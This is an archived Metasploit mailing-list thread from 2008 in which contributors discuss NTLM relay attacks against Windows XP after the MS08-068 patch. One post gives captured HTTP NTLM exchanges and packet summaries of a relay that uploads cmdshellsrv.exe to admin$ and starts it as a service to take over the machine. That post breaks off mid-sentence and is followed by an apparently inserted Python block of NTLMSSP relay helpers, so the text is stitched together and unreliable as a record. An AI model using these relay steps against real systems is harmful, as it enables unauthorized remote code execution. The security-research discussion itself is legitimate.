Re: [framework-hackers] smbrelay

2008-12-22 Thread H D Moore
On Monday 22 December 2008, ArcSighter Elite wrote:
> No, I haven't tested that in such a way. In fact I should check
> metasploit's diffs more often instead of updating :D 

http://grutz.jingojango.net/exploits/pokehashball.html

Not currently integrated, but will be eventually.

In your Python code, which type of NTLM authentication are you using? 
Standard NTLMv2 LANMAN/NTLM, or the fancier NTLMSSP with all of the 
encoded fields? I was wondering whether that made a difference and have 
not had a chance to write/test it yet.

-HD
___
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers


Re: [framework-hackers] smbrelay

2008-12-22 Thread ArcSighter Elite
H D Moore wrote:
> Ah, did you test Metasploit's HTTP-to-SMB attack? More than likely the 
> same method works (Grutz did some work on that), we just need to implement 
> the HTTP server side (or merge Grutz's patches in).
> 
> -HD
> 
> 
> On Monday 22 December 2008, ArcSighter Elite wrote:
>> I don't know yet what the true difference is here. But the fact is that
>> what I've posted successfully works against XP SP(2|3) Spanish. We of
>> course need more testing, but I already know some people qualify what
>> smb_relay does as an SMB-to-SMB attack; and what I'm doing here is some
>> sort of HTTP-to-SMB attack, where the NTLM negotiation is requested
>> by the (fake) web server with 401 + WWW-Authenticate: NTLM. Then the
>> client sends me his authorization field in the NTLM Authorization
>> field. It's a little browser-based. Of course after that, we get SMB
>> traffic, but who cares?
> 
> 

No, I haven't tested it in such a way. In fact I should check
Metasploit's diffs more often instead of updating :D As I already told you,
Metasploit's tests were only performed on the SMB-SMB attack. You have to use
UNC or network browsing; also, the Metasploit module is using 139. I'm a
bit lost here. Does such a thing exist?
I'll do some more tests to get some more basis in the meantime, but I
think you agree the results are worth the pain.



Re: [framework-hackers] smbrelay

2008-12-22 Thread H D Moore
Ah, did you test Metasploit's HTTP-to-SMB attack? More than likely the 
same method works (Grutz did some work on that), we just need to implement 
the HTTP server side (or merge Grutz's patches in).

-HD


On Monday 22 December 2008, ArcSighter Elite wrote:
> I don't know yet what the true difference is here. But the fact is that
> what I've posted successfully works against XP SP(2|3) Spanish. We of
> course need more testing, but I already know some people qualify what
> smb_relay does as an SMB-to-SMB attack; and what I'm doing here is some
> sort of HTTP-to-SMB attack, where the NTLM negotiation is requested
> by the (fake) web server with 401 + WWW-Authenticate: NTLM. Then the
> client sends me his authorization field in the NTLM Authorization
> field. It's a little browser-based. Of course after that, we get SMB
> traffic, but who cares?




Re: [framework-hackers] smbrelay

2008-12-22 Thread ArcSighter Elite
H D Moore wrote:
> On Monday 22 December 2008, ArcSighter Elite wrote:
>> Excuse me for the one-person chat in here.
>> But let me say that smb_relay of metasploit effectively fails after the
>> patch. We already know that, the curious thing is my python script
>> doesn't.
> 
> What is the difference? NTLMSSP instead of NTLMv2?
> 
> -HD
> 

I don't know yet what the true difference is here. But the fact is that
what I've posted successfully works against XP SP(2|3) Spanish. We of
course need more testing, but I already know some people qualify what
smb_relay does as an SMB-to-SMB attack; and what I'm doing here is some
sort of HTTP-to-SMB attack, where the NTLM negotiation is requested by
the (fake) web server with 401 + WWW-Authenticate: NTLM. Then the client
sends me his authorization field in the NTLM Authorization field. It's a
little browser-based. Of course after that, we get SMB traffic, but
who cares?




Re: [framework-hackers] smbrelay

2008-12-22 Thread H D Moore
On Monday 22 December 2008, ArcSighter Elite wrote:
> Excuse me for the one-person chat in here.
> But let me say that smb_relay of metasploit effectively fails after the
> patch. We already know that, the curious thing is my python script
> doesn't.

What is the difference? NTLMSSP instead of NTLMv2?

-HD



Re: [framework-hackers] smbrelay

2008-12-22 Thread ArcSighter Elite
ArcSighter Elite wrote:
> ArcSighter Elite wrote:
>> ArcSighter Elite wrote:
>>> H D Moore wrote:
>>>> On Monday 22 December 2008, ArcSighter Elite wrote:
>>>>> I came up with something this morning. Does the MS08-67 patch, after which
>>>>> challenge keys can't be replayed, also affect the other variants of the
>>>>> attack, such as HTTP 401 + WWW-Authenticate: NTLM, and the IMAP, POP
>>>>> and SMTP versions?
>>>> Supposedly it affects any component that initializes the security 
>>>> negotiation the "right" way, but only during a direct reflection attack. 
>>>> You can still relay to a third-party host regardless of protocol.
>>>> -HD
>>> Well, this is how we go.
>>> Before MS08-067:
>>> Windows XP SP2 Spanish:
>>> I totally owned it. HTTP-based. No user intervention. No nothing. KIS2009
>>> doesn't block it (find-socket).
>>> I totally owned the SMB-SMB attack, UNC share.
>>> After MS08-067:
>>> I owned it too! But this time I got a prompt asking for username and
>>> password; I mean, it doesn't automatically authenticate.
>>> The SMB-SMB attack doesn't spawn my shell.
>>> Tell me what you think, so I can proceed to XP SP3; although I think I will get
>>> the same results.
> 
>> Sorry about the typo: it is MS08-068 that I've applied, not MS08-067 (netapi).
>> It's the right patch, and the results are above.
> 
> Well, it surprisingly seems to work in XP SP3 too, before and after the
> patch; the interesting prompt about username/password authentication
> was my bad; I don't get a prompt on either XP SP3 or XP SP2 after I
> rebooted SP2.
> 
> 
> Here is what I've done (a quick hack in Python):
> 
> 1. Force the browser to authenticate: HTTP 401 + WWW-Authenticate: NTLM
> 
> Ex.:
> (Here *.*.*.1 is server, *.*.*.2 client)
> 
> GET / HTTP/1.1
> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
> application/x-shockwave-flash, application/vnd.ms-excel,
> application/vnd.ms-powerpoint, application/msword, */*
> Accept-Language: es
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
> Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )
> Host: *.*.*.1
> Connection: Keep-Alive
> 
> HTTP/1.1 401 Unauthorized
> Content-Length: 0
> Content-Type: text/html
> Server: Microsoft-IIS/6.0
> WWW-Authenticate: NTLM
> Connection: keep-alive
> 
> GET / HTTP/1.1
> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
> application/x-shockwave-flash, application/vnd.ms-excel,
> application/vnd.ms-powerpoint, application/msword, */*
> Accept-Language: es
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
> Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )
> Host: *.*.*.1
> Connection: Keep-Alive
> Authorization: NTLM TlRAAB4IIogAFASgKDw==
> 
> //-- Avoid null sessions
> 
> HTTP/1.1 401 Access Denied
> Server: Microsoft-IIS/6.0
> WWW-Authenticate: NTLM
> TlRABgAGADgHsgAA+vnrqY91YSEAACwALAA+BQEoCg9XAFMAMgACAAYAVwBTADIAAQAGAFcAUwAyAAQABgB3AHMAMgADAAYAdwBzADIAAA==
> 
> Content-Length: 0
> Content-Type: text/html
> 
> GET / HTTP/1.1
> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
> application/x-shockwave-flash, application/vnd.ms-excel,
> application/vnd.ms-powerpoint, application/msword, */*
> Accept-Language: es
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
> Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )
> Host: *.*.*.1
> Connection: Keep-Alive
> Authorization: NTLM
> TlRGAAYAHwYABgAlBQAFABIGgAaAFwGAAYAdgCsBYIAAgUBKAoPMQAwAC4AMQA1AC4AMwAuADgANgBBAGQAbQBpAG4AaQBzAHQAcgBhAGQAbwByAFcAUwAyADl4VTbp6F8qOXhVNunoXyo5eFU26ehfKrY5HrAdIbqrX4QPLLSy0y8RPgbMsVX5gg==
> 
> 
> HTTP/1.1 200 OK
> Content-Length: 92
> Connection: close
> 
> 2. The basic replay attack (Wireshark summaries only):
> 
> //- Negotiating
> 513   10.025748   *.*.*.1 *.*.*.2
> SMB   Negotiate Protocol Request
> 
> 516   10.026712   *.*.*.1 *.*.*.2 SMB Session Setup AndX Request,
> NTLMSSP_NEGOTIATE
> 
> /-- Authenticating
> 520   10.029566   *.*.*.1 *.*.*.2 SMB Session Setup AndX Request,
> NTLMSSP_AUTH, User: WS2\Administrador
> 
> /-- Accessing IPC$
> 523   10.034183   *.*.*.1 *.*.*.2 SMB Tree Connect AndX Request, Path:
> \\*.*.*.2\IPC$
> 
> /--Accessing admin$
> 531   10.040157   *.*.*.1 *.*.*.2 SMB Tree Connect AndX Request, Path:
> \\*.*.*.2\admin$
> 
> /--Uploading exefile
> 533   10.041749   *.*.*.1 *.*.*.2 SMB NT Create AndX Request, Path:
> \cmdshellsrv.exe
> 
> /--Accessing service control manager.
> 561   1

Re: [framework-hackers] smbrelay

2008-12-22 Thread ArcSighter Elite
ArcSighter Elite wrote:
> ArcSighter Elite wrote:
>> H D Moore wrote:
>>> On Monday 22 December 2008, ArcSighter Elite wrote:
>>>> I came up with something this morning. Does the MS08-67 patch, after which
>>>> challenge keys can't be replayed, also affect the other variants of the
>>>> attack, such as HTTP 401 + WWW-Authenticate: NTLM, and the IMAP, POP
>>>> and SMTP versions?
>>> Supposedly it affects any component that initializes the security 
>>> negotiation the "right" way, but only during a direct reflection attack. 
>>> You can still relay to a third-party host regardless of protocol.
>>> -HD
>> Well, this is how we go.
>> 
>> Before MS08-067:
>> 
>> Windows XP SP2 Spanish:
>> I totally owned it. HTTP-based. No user intervention. No nothing. KIS2009
>> doesn't block it (find-socket).
>> I totally owned the SMB-SMB attack, UNC share.
>> 
>> After MS08-067:
>> I owned it too! But this time I got a prompt asking for username and
>> password; I mean, it doesn't automatically authenticate.
>> The SMB-SMB attack doesn't spawn my shell.
>> 
>> Tell me what you think, so I can proceed to XP SP3; although I think I will get
>> the same results.
> 
> 
> Sorry about the typo: it is MS08-068 that I've applied, not MS08-067 (netapi).
> It's the right patch, and the results are above.

Well, it surprisingly seems to work in XP SP3 too, before and after the
patch; the interesting prompt about username/password authentication
was my bad; I don't get a prompt on either XP SP3 or XP SP2 after I
rebooted SP2.


Here is what I've done (a quick hack in Python):

1. Force the browser to authenticate: HTTP 401 + WWW-Authenticate: NTLM

Ex.:
(Here *.*.*.1 is server, *.*.*.2 client)

GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )
Host: *.*.*.1
Connection: Keep-Alive

HTTP/1.1 401 Unauthorized
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/6.0
WWW-Authenticate: NTLM
Connection: keep-alive

GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )
Host: *.*.*.1
Connection: Keep-Alive
Authorization: NTLM TlRAAB4IIogAFASgKDw==

//-- Avoid null sessions

HTTP/1.1 401 Access Denied
Server: Microsoft-IIS/6.0
WWW-Authenticate: NTLM
TlRABgAGADgHsgAA+vnrqY91YSEAACwALAA+BQEoCg9XAFMAMgACAAYAVwBTADIAAQAGAFcAUwAyAAQABgB3AHMAMgADAAYAdwBzADIAAA==

Content-Length: 0
Content-Type: text/html

GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )
Host: *.*.*.1
Connection: Keep-Alive
Authorization: NTLM
TlRGAAYAHwYABgAlBQAFABIGgAaAFwGAAYAdgCsBYIAAgUBKAoPMQAwAC4AMQA1AC4AMwAuADgANgBBAGQAbQBpAG4AaQBzAHQAcgBhAGQAbwByAFcAUwAyADl4VTbp6F8qOXhVNunoXyo5eFU26ehfKrY5HrAdIbqrX4QPLLSy0y8RPgbMsVX5gg==


HTTP/1.1 200 OK
Content-Length: 92
Connection: close

2. The basic replay attack (Wireshark summaries only):

//- Negotiating
513 10.025748   *.*.*.1 *.*.*.2 SMB Negotiate Protocol Request

516 10.026712   *.*.*.1 *.*.*.2 SMB Session Setup AndX Request,
NTLMSSP_NEGOTIATE

/-- Authenticating
520 10.029566   *.*.*.1 *.*.*.2 SMB Session Setup AndX Request,
NTLMSSP_AUTH, User: WS2\Administrador

/-- Accessing IPC$
523 10.034183   *.*.*.1 *.*.*.2 SMB Tree Connect AndX Request, Path:
\\*.*.*.2\IPC$

/--Accessing admin$
531 10.040157   *.*.*.1 *.*.*.2 SMB Tree Connect AndX Request, Path:
\\*.*.*.2\admin$

/--Uploading exefile
533 10.041749   *.*.*.1 *.*.*.2 SMB NT Create AndX Request, Path:
\cmdshellsrv.exe

/--Accessing service control manager.
561 11.066248   *.*.*.1 *.*.*.2 SMB NT Create AndX Request, FID: 0x4000,
Path: \svcctl

/-- well, I got tired.
The rest you already know: binding, OpenSCManager, OpenService,
StartService => owning!

So please give an
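The exchange above (browser Type 1 in, target's Type 2 back out in the 401, browser Type 3 forwarded into Session Setup AndX) and HD's question about which NTLM flavour the script sees can both be answered by decoding the NTLMSSP messages themselves. The following is an added example, written for this page; it is not ArcSighter's Python script nor Metasploit's smb_relay module. It builds and parses Type 2 (CHALLENGE) and Type 3 (AUTHENTICATE) messages per the MS-NLMP layout (no Version or MIC fields), shows the two relay hand-offs as pure functions (no sockets), and tells NTLMv1 from NTLMv2 by the length of the NtChallengeResponse. The challenge bytes, the NTLMv2 response bytes, the names WS2 / Administrador / CLIENT and the SMB1 SecurityMode values are constructed; the base64 blobs in the post are truncated, so nothing here decodes them.

```python
import base64
import struct

SIGNATURE = b"NTLMSSP\x00"

# NegotiateFlags bits (MS-NLMP) that matter when reading a relayed exchange
NTLMSSP_NEGOTIATE_UNICODE = 0x00000001
NTLMSSP_NEGOTIATE_NTLM = 0x00000200
NTLMSSP_NEGOTIATE_ALWAYS_SIGN = 0x00008000

# SMB1 NegotiateResponse SecurityMode bit: the server requires message signing
SMB1_SECURITY_SIGNATURES_REQUIRED = 0x08

def _utf16(s):
    return s.encode("utf-16-le")

def _field(data, off):
    """Read a (Len, MaxLen, BufferOffset) descriptor at `off`; return the payload it points at."""
    length, _maxlen, offset = struct.unpack_from("<HHI", data, off)
    return data[offset:offset + length]

def _decode(raw, flags):
    return raw.decode("utf-16-le") if flags & NTLMSSP_NEGOTIATE_UNICODE else raw.decode("latin-1")

def build_challenge(server_challenge, target, flags, target_info=b""):
    """CHALLENGE_MESSAGE (Type 2) without the optional Version field: 48-byte header + payload."""
    name = _utf16(target)
    msg = SIGNATURE + struct.pack("<I", 2)
    msg += struct.pack("<HHI", len(name), len(name), 48)          # TargetNameFields
    msg += struct.pack("<I", flags) + server_challenge + b"\x00" * 8
    msg += struct.pack("<HHI", len(target_info), len(target_info), 48 + len(name))
    return msg + name + target_info

def build_authenticate(lm_response, nt_response, domain, user, workstation, flags):
    """AUTHENTICATE_MESSAGE (Type 3) without Version/MIC: 64-byte header + payload."""
    payload = [lm_response, nt_response, _utf16(domain), _utf16(user), _utf16(workstation), b""]
    msg = SIGNATURE + struct.pack("<I", 3)
    offset = 64
    for part in payload:                # Lm, Nt, Domain, User, Workstation, SessionKey fields
        msg += struct.pack("<HHI", len(part), len(part), offset)
        offset += len(part)
    return msg + struct.pack("<I", flags) + b"".join(payload)

def parse_ntlm(blob):
    """Decode a Type 1, 2 or 3 message given raw bytes or the base64 form used in HTTP headers."""
    data = base64.b64decode(blob) if isinstance(blob, str) else blob
    if data[:8] != SIGNATURE:
        raise ValueError("not an NTLMSSP message")
    msg_type = struct.unpack_from("<I", data, 8)[0]
    if msg_type == 1:
        return {"type": 1, "flags": struct.unpack_from("<I", data, 12)[0]}
    if msg_type == 2:
        flags = struct.unpack_from("<I", data, 20)[0]
        return {"type": 2, "flags": flags, "target": _decode(_field(data, 12), flags),
                "challenge": data[24:32], "target_info": _field(data, 40)}
    if msg_type == 3:
        flags = struct.unpack_from("<I", data, 60)[0]
        nt_response = _field(data, 20)
        return {"type": 3, "flags": flags, "lm_response": _field(data, 12), "nt_response": nt_response,
                "domain": _decode(_field(data, 28), flags), "user": _decode(_field(data, 36), flags),
                "workstation": _decode(_field(data, 44), flags),
                # a 24-byte NtChallengeResponse is NTLMv1; longer is NTLMv2 (NTProofStr + blob)
                "ntlm_version": 2 if len(nt_response) > 24 else 1}
    raise ValueError("unknown message type %d" % msg_type)

def www_authenticate_header(type2_from_target):
    """Relay hand-off: the Type 2 received from the SMB target goes back to the browser in the 401."""
    return "WWW-Authenticate: NTLM " + base64.b64encode(type2_from_target).decode("ascii")

def security_blob_from_authorization(header_value):
    """Relay hand-off: the browser's Authorization value becomes the Session Setup AndX blob."""
    scheme, _, b64 = header_value.strip().partition(" ")
    if scheme.upper() != "NTLM":
        raise ValueError("expected the NTLM scheme")
    return base64.b64decode(b64)

def smb1_signing_required(security_mode):
    """The relay never learns the session key, so a target that requires signing defeats it."""
    return bool(security_mode & SMB1_SECURITY_SIGNATURES_REQUIRED)

def demo():
    """Constructed exchange: challenge from the target to the browser, answer from the browser to the target."""
    flags = NTLMSSP_NEGOTIATE_UNICODE | NTLMSSP_NEGOTIATE_NTLM | NTLMSSP_NEGOTIATE_ALWAYS_SIGN
    challenge = bytes.fromhex("0123456789abcdef")          # constructed, not from a capture
    header = www_authenticate_header(build_challenge(challenge, "WS2", flags))
    # a constructed NTLMv2 answer: 16-byte NTProofStr followed by a minimal blob
    nt_response = bytes(16) + bytes.fromhex("0101000000000000") + bytes(24)
    type3 = build_authenticate(bytes(24), nt_response, "WS2", "Administrador", "CLIENT", flags)
    blob = security_blob_from_authorization("NTLM " + base64.b64encode(type3).decode("ascii"))
    return parse_ntlm(header.split(" ", 2)[2]), parse_ntlm(blob)

if __name__ == "__main__":
    t2, t3 = demo()
    print("challenge %s from %s; %s\\%s answered with NTLMv%d" % (
        t2["challenge"].hex(), t2["target"], t3["domain"], t3["user"], t3["ntlm_version"]))
```

The point the functions make: the base64 value in the HTTP Authorization header is byte-for-byte the same NTLMSSP message that goes into the Session Setup AndX security blob, and the response in it is bound only to the 8-byte challenge the relay copied from the target, not to who presented it. That is why the HTTP-to-SMB variant survives a fix aimed at reflection back to the originating host. The one check on the SMB side that stops the relay cold is the target requiring signing (SecurityMode bit 0x08 in the SMB1 Negotiate response), because the relay cannot produce the session key from the messages it forwards.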

Re: [framework-hackers] smbrelay

2008-12-22 Thread ArcSighter Elite
ArcSighter Elite wrote:
> H D Moore wrote:
>> On Monday 22 December 2008, ArcSighter Elite wrote:
>>> I came up with something this morning. Does the MS08-67 patch, after which
>>> challenge keys can't be replayed, also affect the other variants of the
>>> attack, such as HTTP 401 + WWW-Authenticate: NTLM, and the IMAP, POP
>>> and SMTP versions?
>> Supposedly it affects any component that initializes the security 
>> negotiation the "right" way, but only during a direct reflection attack. 
>> You can still relay to a third-party host regardless of protocol.
> 
>> -HD
> Well, this is how we go.
> 
> Before MS08-067:
> 
> Windows XP SP2 Spanish:
> I totally owned it. HTTP-based. No user intervention. No nothing. KIS2009
> doesn't block it (find-socket).
> I totally owned the SMB-SMB attack, UNC share.
> 
> After MS08-067:
> I owned it too! But this time I got a prompt asking for username and
> password; I mean, it doesn't automatically authenticate.
> The SMB-SMB attack doesn't spawn my shell.
> 
> Tell me what you think, so I can proceed to XP SP3; although I think I will get
> the same results.
> 

Sorry about the typo: it is MS08-068 that I've applied, not MS08-067 (netapi).
It's the right patch, and the results are above.


Re: [framework-hackers] smbrelay

2008-12-22 Thread ArcSighter Elite
H D Moore wrote:
> On Monday 22 December 2008, ArcSighter Elite wrote:
>> I came up with something this morning. Does the MS08-67 patch, after which
>> challenge keys can't be replayed, also affect the other variants of the
>> attack, such as HTTP 401 + WWW-Authenticate: NTLM, and the IMAP, POP
>> and SMTP versions?
> 
> Supposedly it affects any component that initializes the security 
> negotiation the "right" way, but only during a direct reflection attack. 
> You can still relay to a third-party host regardless of protocol.
> 
> -HD

Well, this is how we go.

Before MS08-067:

Windows XP SP2 Spanish:
I totally owned it. HTTP-based. No user intervention. No nothing. KIS2009
doesn't block it (find-socket).
I totally owned the SMB-SMB attack, UNC share.

After MS08-067:
I owned it too! But this time I got a prompt asking for username and
password; I mean, it doesn't automatically authenticate.
The SMB-SMB attack doesn't spawn my shell.


Tell me what you think, so I can proceed to XP SP3; although I think I will get
the same results.



Re: [framework-hackers] smbrelay

2008-12-22 Thread H D Moore
On Monday 22 December 2008, ArcSighter Elite wrote:
> Yes, I know the replay attack is still working. I'm talking about the
> reflection one here.

Microsoft fixed a bug in the Windows Media Player this month where 
reflection still worked. It sounds like this was the exception because of 
how the security descriptor was initialized; if other apps have the same 
issue, I bet Microsoft would patch them as well.

> I'm going to do some tests right away. Wait for results.

Looking forward to it,

-HD




Re: [framework-hackers] smbrelay

2008-12-22 Thread ArcSighter Elite
H D Moore wrote:
> On Monday 22 December 2008, ArcSighter Elite wrote:
>> I came up with something this morning. Does the MS08-67 patch, after which
>> challenge keys can't be replayed, also affect the other variants of the
>> attack, such as HTTP 401 + WWW-Authenticate: NTLM, and the IMAP, POP
>> and SMTP versions?
> 
> Supposedly it affects any component that initializes the security 
> negotiation the "right" way, but only during a direct reflection attack. 
> You can still relay to a third-party host regardless of protocol.
> 
> -HD

Yes, I know the replay attack is still working. I'm talking about the
reflection one here.
I'm going to do some tests right away. Wait for results.

Sincerely.


Re: [framework-hackers] smbrelay

2008-12-22 Thread H D Moore
On Monday 22 December 2008, ArcSighter Elite wrote:
> I came up with something this morning. Does the MS08-67 patch, after which
> challenge keys can't be replayed, also affect the other variants of the
> attack, such as HTTP 401 + WWW-Authenticate: NTLM, and the IMAP, POP
> and SMTP versions?

Supposedly it affects any component that initializes the security 
negotiation the "right" way, but only during a direct reflection attack. 
You can still relay to a third-party host regardless of protocol.

-HD



[framework-hackers] smbrelay

2008-12-22 Thread ArcSighter Elite
Hi guys.

I came up with something this morning. Does the MS08-67 patch, after which
challenge keys can't be replayed, also affect the other variants of the
attack, such as HTTP 401 + WWW-Authenticate: NTLM, and the IMAP, POP and
SMTP versions?

Sincerely.